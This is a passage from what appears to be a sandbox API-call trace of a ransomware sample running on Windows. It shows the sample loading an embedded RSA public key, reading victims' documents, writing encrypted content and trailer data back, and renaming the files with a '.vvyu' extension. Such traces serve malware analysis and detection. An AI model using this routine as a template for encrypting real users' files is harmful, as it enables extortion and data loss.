KEY-----\\\\n") returned 492 [0193.879] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.879] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.880] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.880] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.880] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.880] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.880] GetLastError () returned 0x0 [0193.880] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.880] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.881] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.881] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.881] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x177f0) returned 0x2ea79b0 [0193.882] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0ba0 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b38 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0be8 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657270 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.882] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea1a68 [0193.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a68 | out: hHeap=0x620000) returned 1 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x657228 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0193.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.885] GetCurrentThreadId () returned 0x66c [0193.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f770 [0193.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.886] GetCurrentThreadId () returned 0x66c [0193.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6573d8 [0193.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657228 [0193.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657270 [0193.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572b8 [0193.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657300 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x6572d0 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x657210 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea1a80 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657210 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572d0 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x657228 [0193.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea2a68 [0193.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6573d8 | out: hHeap=0x620000) returned 1 [0193.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1a80 | out: hHeap=0x620000) returned 1 [0193.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea2c78 [0193.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0193.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657228 | out: hHeap=0x620000) returned 1 [0193.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea2e90 [0193.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0193.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e90 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657210 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657300 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x657270 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6572b8 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0be8 | out: hHeap=0x620000) returned 1 [0193.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.897] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x177e1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x177e1, lpOverlapped=0x0) returned 1 [0193.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.899] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x177e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.899] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea2a68 [0193.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea2a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea2e98 [0193.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.900] WriteFile (in: hFile=0x568, lpBuffer=0x2ea2e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea2e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e98 | out: hHeap=0x620000) returned 1 [0193.901] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.901] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.901] CloseHandle (hObject=0x568) returned 1 [0193.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea2a68 [0193.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.903] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\K0lcD1nSajNFFT.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\k0lcd1nsajnfft.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\K0lcD1nSajNFFT.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\k0lcd1nsajnfft.odp.vvyu")) returned 1 [0193.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2a68 | out: hHeap=0x620000) returned 1 [0193.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.905] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.908] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b08bd0, ftCreationTime.dwHighDateTime=0x1d8a3fa, ftLastAccessTime.dwLowDateTime=0x20c101e0, ftLastAccessTime.dwHighDateTime=0x1d8a46d, ftLastWriteTime.dwLowDateTime=0x20c101e0, ftLastWriteTime.dwHighDateTime=0x1d8a46d, nFileSizeHigh=0x0, nFileSizeLow=0x16086, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KUOP p2txHoo7bw7O.doc", cAlternateFileName="KUOPP2~1.DOC")) returned 1 [0193.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0be8 [0193.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0193.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0be8 | out: hHeap=0x620000) returned 1 [0193.909] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\KUOP p2txHoo7bw7O.doc") returned=".doc" [0193.909] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\KUOP p2txHoo7bw7O.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\kuop p2txhoo7bw7o.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.910] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=90246) returned 1 [0193.910] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.913] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x16060, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.913] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.915] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.916] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x16086, lpOverlapped=0x0) returned 1 [0193.917] lstrlenA (lpString="-----BEGIN PUBLIC 